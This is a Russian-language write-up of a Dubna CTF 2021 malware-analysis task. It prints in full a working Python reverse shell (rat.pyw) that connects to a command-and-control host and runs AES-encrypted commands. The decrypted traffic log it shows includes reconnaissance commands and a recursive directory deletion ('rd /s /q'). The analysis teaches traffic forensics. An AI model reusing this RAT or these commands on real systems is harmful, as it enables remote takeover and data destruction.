Dubna CTF 2021. Райтапы на задачи. 1 w1sh 1 w1ll r3v3rs3 y0ur r3m0t3 4dm1n t00l
@ Rakovsky Stanislav | Saturday, May 8, 2021 | 14 minutes read | Update at Saturday, May 8, 2021

Райтап на одну из самых комплексных задач отборочного этапа:

  • [1000 pts, reverse] 1_w1sh_1_w1ll_r3v3rs3_y0ur_r3m0t3_4dm1n_t00l

[1000 pts, reverse] 1_w1sh_1_w1ll_r3v3rs3_y0ur_r3m0t3_4dm1n_t00l

Привет. Нам тут фишинговое письмо прислали, представляешь! Решили закинуть в виртуалку, пошли пить чай, возвращаемся - а тут бадамс! - в виртуалке кавардак. Ну, хотя бы траффик записали.

Прикладываю письмо и дамп траффика. Задача весьма непростая, поэтому не стесняйтесь обращаться, я спокойно отвечу на вопросы по ней.

Автор: @hexadec1mal

Message.eml

task.pcapng

Изучаем письмо. Формат eml можно открыть в почтовых приложениях типа Outlook, Mozilla Thunderbird.

Зашифровать архив, указать пароль от него в тексте письма, да еще и не точную версию (просьба добавить нижние подчеркивания) - отличная техника против почтовых антивирусов. Им не остается ничего, как либо пометить письмо как подозрительное, либо забраковать его - в зависимости от строгости политик.

Смотрим вердикт DIE по вложению в письме:

Скорее всего самораспаковывающийся архив WinRar. В виртуальной машине открываем файл WinRar-ом (это нужно, чтобы посмотреть скрипт sfx):

Хаха, глупый злоумышленник подписал свой файл как rat.pyw, что сразу намекает на класс вредоноса - Remote Admin Tool. Также файл не запустится, если на системе не стоит Python с пропиской в %PATH%.

Справа видим скрипт - при правильном пароле sfx-архив закинет своё содержание во временную папку, без вопросительных или вопросительных окон, и запустит скрипт.

Файл cr.py - почти неизменная реализация алгоритма AES из гитхаба.

А вот файл rat.pyw уже интереснее. Взглянем на него:

import os, socket, subprocess, time;

from cr import encrypt, decrypt




HOST = 'dubna2021-malware-analysis-task.disasm.me'
# HOST = 'localhost'
PORT = 43456


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

while 1:
    try:
        key = str(time.time()//100)
        print("Sending...")
        s.send(encrypt(key, os.getcwd() + "> ").encode())
        print("Sent!")
        data = s.recv(1024*16)
        key = str(time.time()//100)
        data = decrypt(key, data.decode()).decode()
        print("RECV!", data)
        
        if data == "quit": 
            exit()
        if data.startswith("cd"):
            os.chdir(data[3:])
        if len(data) > 0:
            proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) 
            stdout_value = proc.stdout.read() + proc.stderr.read()
            output_str = str(stdout_value, "UTF-8")
            s.send(encrypt(key, "\n" + output_str).encode())
    except Exception as e:
        print(e)
        exit()
    
s.close()

Домен… Домен подсказывает, что это либо внутренний пентест, либо злоумышленник получил доступ к одному из доменов нашей организации, и с него ведет атаку… Кто знает, это тема не для сегодняшней разборки.

Мы видим простой реверс-шелл, который исполняет команды, полученные от контрольного сервера, при этом команды шифруются AES-ом, ключом текущее время с окном в 100 секунд. Неприятно, что скажешь…

Давайте посмотрим на дамп траффика. Заглянем в Statistics - Conversations:

Отлично, мы знаем домен… А он какой-то знакомый, не находите?) Отфильтруем пакеты по адресу:

Только 15% пакетов относятся к таску. И все эти пакеты относятся к одной TCP-сессии, что весьма удобно. А еще… У нас сохранилось время отправки каждого пакета! Офигеть, нам не придётся брутить время (хотя это тоже вариант) - мы можем без дополнительного кода решить таск. Сколько там пакетов? 50? Ручками за полчаса управимся. Однако автоматизация - друг молодёжи и аналитика, поэтому давайте автоматизируем, тем более что у нас почти всё для этого есть.

Очистим pcap, чтобы не приходилось писать лишние проверки в коде: File - Export Specified Packets - All Packets x Selected Packets.

Я страстно предлагаю питонистам пользоваться Jupyter Notebook или Jupyter Lab вместо консоли или текстовых файлов, это здорово ускоряет и облегчает разработку.

Вариантов парсить pcap-ы на питоне много, я использую scapy. Хоть инструмент сложнее простых парсеров, но и предоставляет много возможностей, например слушать интерфейс, фаззить пакеты.

Спустя 20 минут получился вот такой простенький код, который расшифровывает общение:

from scapy.all import *

a=rdpcap("cleared.pcapng")

from cr import encrypt, decrypt

prev_payload = b""
for pkt in a:
    payload = pkt[TCP].payload
    if payload and isinstance(payload, scapy.packet.Raw) and not isinstance(payload, scapy.packet.Padding): # clear from padding
        #print(payload, type(payload))
        payload = bytes(payload).decode()
        
        print(pkt.summary())
        try:
            key = str(float(pkt.time) // 100)
            dec =  decrypt(key, payload)
            print(dec.decode())
        except:
            print("Broken packet! Try to split")
            payload = prev_payload + payload
            dec =  decrypt(key, payload)
            print(dec.decode())
        print("#"*30)
        prev_payload = payload

Выхлоп скрипта представлен ниже:

Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1\AppData\Local\Temp\RarSFX0> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
dir
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw

 Volume in drive C has no label.
 Volume Serial Number is 8CC1-6273

 Directory of C:\Users\ALEXEY~1\AppData\Local\Temp\RarSFX0

04/29/2021  01:22 PM    <DIR>          .
04/29/2021  01:22 PM    <DIR>          ..
04/25/2021  08:39 AM             4,241 cr.py
04/25/2021  09:58 AM             1,116 rat.pyw
04/29/2021  01:22 PM    <DIR>          __pycache__
               2 File(s)          5,357 bytes
               3 Dir(s)  116,712,620,032 bytes free

##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1\AppData\Local\Temp\RarSFX0> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
cd ..
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw


##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1\AppData\Local\Temp> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
dir
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 A / Raw

 Volume in drive C has no label.
 Volume Serial Number is 8CC1-6273

 Directory of C:\Users\ALEXEY~1\AppData\Local\Temp

04/29/2021  01:22 PM    <DIR>          .
04/29/2021  01:22 PM    <DIR>          ..
04/29/2021  01:16 PM                 0 04cb94b1-4898-4b81-b3f6-572731d44422.tmp
04/29/2021  01:20 PM                 0 1e6aafd7-0380-4242-b9df-f869f8163af8.tmp
02/11/2020  12:59 PM            49,208 Alexey Nikiforov.bmp
04/29/2021  01:07 PM            24,363 chrome_installer.log
04/29/2021  01:05 PM            17,451 dd_vcredist_amd64_20210429130505.log
04/29/2021  01:05 PM           125,984 dd_vcredist_amd64_20210429130505_001_vcRuntimeMinimum_x64.log
04/29/2021  01:05 PM           131,826 dd_vcredist_amd64_20210429130505_002_vcRuntimeAdditional_x64.log
02/11/2020  12:59 PM                 0 FXSAPIDebugLogFile.txt
04/29/2021  01:02 PM    <DIR>          Low
04/29/2021  01:01 PM    <DIR>          msdt
04/29/2021  01:16 PM            84,738 Python 3.6.8 (64-bit)_20210429131553.log
04/29/2021  01:16 PM            87,916 Python 3.6.8 (64-bit)_20210429131553_000_core_JustForMe.log
04/29/2021  01:16 PM           290,488 Python 3.6.8 (64-bit)_20210429131553_001_dev_JustForMe.log
04/29/2021  01:16 PM           116,028 Python 3.6.8 (64-bit)_20210429131553_002_exe_JustForMe.log
04/29/2021  01:16 PM         1,956,876 Python 3.6.8 (64-bit)_20210429131553_003_lib_JustForMe.log
04/29/2021  01:16 PM         2,415,066 Python 3.6.
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
Broken packet! Try to split

 Volume in drive C has no label.
 Volume Serial Number is 8CC1-6273

 Directory of C:\Users\ALEXEY~1\AppData\Local\Temp

04/29/2021  01:22 PM    <DIR>          .
04/29/2021  01:22 PM    <DIR>          ..
04/29/2021  01:16 PM                 0 04cb94b1-4898-4b81-b3f6-572731d44422.tmp
04/29/2021  01:20 PM                 0 1e6aafd7-0380-4242-b9df-f869f8163af8.tmp
02/11/2020  12:59 PM            49,208 Alexey Nikiforov.bmp
04/29/2021  01:07 PM            24,363 chrome_installer.log
04/29/2021  01:05 PM            17,451 dd_vcredist_amd64_20210429130505.log
04/29/2021  01:05 PM           125,984 dd_vcredist_amd64_20210429130505_001_vcRuntimeMinimum_x64.log
04/29/2021  01:05 PM           131,826 dd_vcredist_amd64_20210429130505_002_vcRuntimeAdditional_x64.log
02/11/2020  12:59 PM                 0 FXSAPIDebugLogFile.txt
04/29/2021  01:02 PM    <DIR>          Low
04/29/2021  01:01 PM    <DIR>          msdt
04/29/2021  01:16 PM            84,738 Python 3.6.8 (64-bit)_20210429131553.log
04/29/2021  01:16 PM            87,916 Python 3.6.8 (64-bit)_20210429131553_000_core_JustForMe.log
04/29/2021  01:16 PM           290,488 Python 3.6.8 (64-bit)_20210429131553_001_dev_JustForMe.log
04/29/2021  01:16 PM           116,028 Python 3.6.8 (64-bit)_20210429131553_002_exe_JustForMe.log
04/29/2021  01:16 PM         1,956,876 Python 3.6.8 (64-bit)_20210429131553_003_lib_JustForMe.log
04/29/2021  01:16 PM         2,415,066 Python 3.6.8 (64-bit)_20210429131553_004_test_JustForMe.log
04/29/2021  01:16 PM            97,818 Python 3.6.8 (64-bit)_20210429131553_005_doc_JustForMe.log
04/29/2021  01:16 PM           324,344 Python 3.6.8 (64-bit)_20210429131553_006_tools_JustForMe.log
04/29/2021  01:16 PM         3,242,744 Python 3.6.8 (64-bit)_20210429131553_007_tcltk_JustForMe.log
04/29/2021  01:16 PM           106,476 Python 3.6.8 (64-bit)_20210429131553_008_launcher_AllUsers.log
04/29/2021  01:16 PM            86,620 Python 3.6.8 (64-bit)_20210429131553_009_pip_JustForMe.log
04/29/2021  01:16 PM            87,988 Python 3.6.8 (64-bit)_20210429131553_010_path_JustForMe.log
04/29/2021  01:22 PM    <DIR>          RarSFX0
04/29/2021  01:08 PM    <DIR>          VirtualBox Dropped Files
04/29/2021  01:22 PM               360 wireshark_Local Area ConnectionO4HP20.pcapng
              21 File(s)      9,246,294 bytes
               6 Dir(s)  116,712,620,032 bytes free

##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1\AppData\Local\Temp> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
cd ..
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw


##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1\AppData\Local> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
dir
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw

 Volume in drive C has no label.
 Volume Serial Number is 8CC1-6273

 Directory of C:\Users\ALEXEY~1\AppData\Local

04/29/2021  01:16 PM    <DIR>          .
04/29/2021  01:16 PM    <DIR>          ..
02/11/2020  02:20 PM    <DIR>          Diagnostics
04/29/2021  01:16 PM    <DIR>          Google
02/11/2020  12:59 PM    <DIR>          Microsoft
04/29/2021  01:16 PM    <DIR>          Package Cache
04/29/2021  01:16 PM    <DIR>          Programs
04/29/2021  01:22 PM    <DIR>          Temp
02/11/2020  12:59 PM    <DIR>          VirtualStore
               0 File(s)              0 bytes
               9 Dir(s)  116,712,620,032 bytes free

##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1\AppData\Local> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
cd ..\..
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw


##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
dir
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw

 Volume in drive C has no label.
 Volume Serial Number is 8CC1-6273

 Directory of C:\Users\ALEXEY~1

02/11/2020  12:59 PM    <DIR>          .
02/11/2020  12:59 PM    <DIR>          ..
02/11/2020  12:59 PM    <DIR>          Contacts
04/29/2021  01:08 PM    <DIR>          Desktop
02/11/2020  12:59 PM    <DIR>          Documents
04/29/2021  01:15 PM    <DIR>          Downloads
02/11/2020  12:59 PM    <DIR>          Favorites
02/11/2020  12:59 PM    <DIR>          Links
02/11/2020  12:59 PM    <DIR>          Music
02/11/2020  12:59 PM    <DIR>          Pictures
02/11/2020  12:59 PM    <DIR>          Saved Games
02/11/2020  12:59 PM    <DIR>          Searches
02/11/2020  12:59 PM    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  116,712,620,032 bytes free

##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
dir Documents
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw

 Volume in drive C has no label.
 Volume Serial Number is 8CC1-6273

 Directory of C:\Users\ALEXEY~1\Documents

02/11/2020  12:59 PM    <DIR>          .
02/11/2020  12:59 PM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)  116,712,620,032 bytes free

##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
dir Pictures
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw

 Volume in drive C has no label.
 Volume Serial Number is 8CC1-6273

 Directory of C:\Users\ALEXEY~1\Pictures

02/11/2020  12:59 PM    <DIR>          .
02/11/2020  12:59 PM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)  116,712,071,168 bytes free

##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
whoami
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw

alexeynikiforov\alexey nikiforov

##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
net user
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw


User accounts for \\ALEXEYNIKIFOROV

-------------------------------------------------------------------------------
Administrator            Alexey Nikiforov         Guest                    
The command completed successfully.


##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
ver
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw


Microsoft Windows [Version 6.1.7601]

##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
ipconfig
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw


Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::60b6:f1ea:7574:81bc%11
   IPv4 Address. . . . . . . . . . . : 10.0.2.15
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.2.2

Tunnel adapter isatap.{E56B6F31-ADEA-4B0E-8F03-36F0BC5FC597}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
tasklist
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw


Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0         24 K
System                           4 Services                   0      2,836 K
smss.exe                       268 Services                   0        836 K
csrss.exe                      352 Services                   0      3,268 K
wininit.exe                    404 Services                   0      3,584 K
csrss.exe                      412 Console                    1      8,572 K
winlogon.exe                   468 Console                    1      5,080 K
services.exe                   504 Services                   0      6,760 K
lsass.exe                      520 Services                   0      8,316 K
lsm.exe                        528 Services                   0      3,312 K
svchost.exe                    628 Services                   0      7,216 K
VBoxService.exe                692 Services                   0      4,424 K
svchost.exe                    748 Services                   0      6,240 K
svchost.exe                    800 Services                   0     15,460 K
svchost.exe                    908 Services                   0     71,648 K
svchost.exe                    960 Services                   0     29,176 K
svchost.exe                    572 Services                   0     11,380 K
svchost.exe                    956 Services                   0     26,048 K
spoolsv.exe                   1136 Services                   0      7,588 K
svchost.exe                   1192 Services                   0     10,224 K
taskhost.exe                  1328 Console                    1      7,212 K
svchost.exe                   1336 Services                   0      8,224 K
sppsvc.exe                    1752 Services                   0      6,452 K
dwm.exe                       1800 Console                    1      3,924 K
explorer.exe                  1240 Console                    1     45,044 K
VBoxTray.exe                   940 Console                    1      5,464 K
SearchIndexer.exe             1112 Services                   0     14,996 K
svchost.exe                   2212 Services                   0     10,288 K
chrome.exe                    2864 Console                    1    121,132 K
chrome.exe                    2876 Console                    1      5,412 K
chrome.exe                    3024 Console                    1     28,056 K
chrome.exe                    3060 Console                    1     18,268 K
chrome.exe                    2484 Console                    1     32,848 K
svchost.exe                    592 Services                   0     24,724 K
msiexec.exe                   3568 Services                   0     16,196 K
chrome.exe                    3348 Console                    1    132,132 K
taskmgr.exe                   2836 Console                    1      9,076 K
Wireshark.exe                 2268 Console                    1    133,172 K
taskeng.exe                   3872 Services                   0      4,640 K
chrome.exe                    2084 Console                    1     21,008 K
dumpcap.exe                   2076 Console                    1      7,244 K
conhost.exe                    924 Console                    1      4,452 K
????? ??? ?????? ?? ????.     3288 Console                    1     11,120 K
pythonw.exe                   2680 Console                    1     11,132 K
cmd.exe                       2712 Console                    1      2,468 K
conhost.exe                   3208 Console                    1      4,376 K
tasklist.exe                  2936 Console                    1      5,172 K
WmiPrvSE.exe                  1380 Services                   0      5,740 K

##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
echo "hell no there is wireshark"
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw

"hell no there is wireshark"

##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
echo "... and virtualbox..."
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw

"... and virtualbox..."

##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
echo "Am I monitored?"
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw

"Am I monitored?"

##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
echo "dubna{1_d0_n07_l1k3_pr3p4r3d_3nv1r0nm3n7}" > flag.txt
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw


##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
rm flag.txt
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw

'rm' is not recognized as an internal or external command,
operable program or batch file.

##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
remove flag.txt
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw

'remove' is not recognized as an internal or external command,
operable program or batch file.

##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
del flag.txt
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw


##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users\ALEXEY~1> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
cd ..
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw


##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
dir
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw

 Volume in drive C has no label.
 Volume Serial Number is 8CC1-6273

 Directory of C:\Users

02/11/2020  12:59 PM    <DIR>          .
02/11/2020  12:59 PM    <DIR>          ..
04/29/2021  01:30 PM    <DIR>          Alexey Nikiforov
07/13/2009  09:59 PM    <DIR>          Public
               0 File(s)              0 bytes
               4 Dir(s)  116,709,670,912 bytes free

##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
echo "hahah! Bye!"
##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw

"hahah! Bye!"

##############################
Ether / IP / TCP 10.0.2.15:49239 > 51.15.57.105:43456 PA / Raw
C:\Users> 
##############################
Ether / IP / TCP 51.15.57.105:43456 > 10.0.2.15:49239 PA / Raw
rd /s /q .\
##############################

То есть следуя цепочке действий, злоумышленник провёл небольшую разведку с помощью команд dir, cd, whoami, net user, ver, ipconfig, в tasklist обнаружил работающий wireshark и агент virtualbox-а, положил флаг в корень пользовательской директории, затем его удалил, после чего запустил аналог rm -rf.


UPD: как можно обойтись без знания времени, которое хранится в pcap (вдруг об этом только что узнали)?

Можно попробовать побрутить время, предположив, что автор написал таск k недель назад (в принципе можем отталкиваться от времени отправки письма). Вот простенький скрипт на брут последних 6 месяцев в данном случае:

from cr import encrypt, decrypt

for pkt in a:
    payload = pkt[TCP].payload
    if payload and isinstance(payload, scapy.packet.Raw) and not isinstance(payload, scapy.packet.Padding): # clear from padding
        #print(payload, type(payload))
        payload = bytes(payload).decode()
        break
        
payload # '1B139558C58BDA66AF8ED4F885AF86A1A0C52D2E58309C1105D08FE22343A8D642F9473D62DEAFEDBF786497F194'

import time
from string import printable
t = time.time()
tt = t - 6*30*24*60*60

for key in range(int(tt//100), int(t//100)):
    key = str(float(key)) # там именно float, нам нужно .0 на конце
    
    dec =  decrypt(key, payload)
    
    if all(chr(i) in printable for i in dec[:10]): # вхождение первых 10 символов в печатаемые
        print("Candidate", key, dec)

Выхлоп:

Candidate 16081773.0 b"?WlK')bHb{\xfe\xb6~\x1a\xbb\x9bwH\xd7\r\xc6\xbaq\xbd\xb0=\x04D\xa4\xb8!\xb2'P\x80\xe2Sy\x8b\x11\xd5\xc5'\xfce\xbb"
Candidate 16104704.0 b'I#kAr2e~]\x0ci\x1cA\x897\x046\x96\x0b\xe3]\xd6\x14\xd5yG`b \xe0o\xbcYkY\xc5\x1dR\xcdO\xc8>c\xcb\xc0h'
Candidate 16104759.0 b'\x0bNVt@Oq>D)0\xd6\xf6\xca\x0c\x06l.z\x87\xdf89\x06\x14Z\x9c\x94\x9a\x8dTRg\x08\x86"\x9d\x9b@/\rr:\xc8\xcf\x89'
Candidate 16108652.0 b"UkP=8LB;7'\xe3\xc9\x07j\xa2~\x05<\xcc\x91)\n\x01\xfd\x0c\xed\xa7:\xcf\x857\x8fi\x045\xdc\xaf\xf5\x08\xb2\x1d\x9c\x0e\r\xc8\x13"
Candidate 16112173.0 b'e9Z\x0c"/p9YM\xc2F%\x01\x0e\'\xf8\x84\x17\xe3O\'\xfaZe\x90\xf50\xdfI{\xce\x82\xee\x91~\x9c\xd1\xa9\x061du\xae\xb3\xe9'
Candidate 16113055.0 b'|XEm3st1qB\xf3\xf2)\x18\xf7\xf2k\x9f\xd4\xd3r\xe5H\xbbz3\xb3\xdb\x920s\x04wT;z7{G\x9d\xce\x83\r\xb5"-'
Candidate 16128720.0 b'6HC>A_a+v[\xd9L\x1e\xe8\x9b\xda\x1d*c\x89\xa7\xbau\x9fa0H\x99\xa9\xb8\xa6Ej2\x17\x15\x90\xfb\xeajF<\xbe\xca\xabm'
Candidate 16135348.0 b'xK\r/qmv\x0ck1\xa2\x9e\xfdU6\xbas\xc4\x12Z\x83\xb2\xd7\xbb\xcaS\xa9}\x85\x1e\xf5\x0f\t\x85\x1dxX\xfdh\\\xf0p\xfe\xf7J\xf7'
Candidate 16141547.0 b'd,gQ!`ib2O\xacd\xd8\x8eD$E\xa0\xfd\x0c9\xfd\x0b\xa1\xc1O\xe6@}\xd4m\xe6\xbea/#\x13\xfb\xe3\xde<2Z\x9fDO'
Candidate 16158631.0 b"\t)Bn&2,O<MA6\xecX\xae9z>z\xdc\x8f'V)\xfd\xd2&\xcd\x00\xe7\xf3\x82\x1b\xbc\xb98\x91\xc2g~\xef\x1b\x85\x1f\xe5\xc4"
Candidate 16159206.0 b']0Lo aafb>\x02\xcb\xa3>\x8f\xbc\xa9.@\x10\x0e\x10\xdcV\x9f\xe1b\xf5\xd2\x81\x9bf\xfbVhlN\x97\x19ma\xb7\xa4\x168e'
Candidate 16161914.0 b'%hywIRTK(H\xe7\x14l\x15Fl\x8c\xc2\xae\xbd\xe6\xb4\xda,\xdc\xda\xa9;\xca\xb6)\x1b\xf8eV\xd8\xbdY\xbf\x98\xcc&\xbb\xe6\xdd\x04'
Candidate 16167493.0 b'.11_nn9Kv`\x10\x1d4\x83\xa3\xad\xf6k%F\xcc\x18\xac\x1ec\x1a\x8e\x9et\xec\x8b=\xc4\x1e\x8f\xfe\xf1\xc5\xfe\xd4\xbdc\x9e\xf1\x16^'
Candidate 16191819.0 b'0ArYz(X9j%\xea\x0e\xaa.>\xb0\xd5\xc0\xd6\x92\xd0S\xbe\x9b\x8f\xe2V_\xe0\x02b\x93l\xd7\x0e\xbd\xb5\x0c\xf0\xdc\xf6&K\x9e#\xa8'
Candidate 16193484.0 b')py/^v/iyf\xdb\xdcN\xf8\x1eh\x0bk\xe0b\xfd\xc90\x9e\xfey\x9d\xa4\n\xe2x\xef\x86.k{\xc3O\x0f\xe6\x11W\x7f\xday.'
Candidate 16197277.0 b'C:\\Users\\ALEXEY~1\\AppData\\Local\\Temp\\RarSFX0> '

Нашли правильный ключ! Всё, мы замечательны!

Cats!

Under construction

Wow! Flipable!

Hello from another side of the Moon!

Looking for a flag? Okay, take this:
LFXXKIDBOJSSA43XMVSXIIC6LYQCAIA=

About me

Under construction. You can try to contact me and fill this field… haha… ha…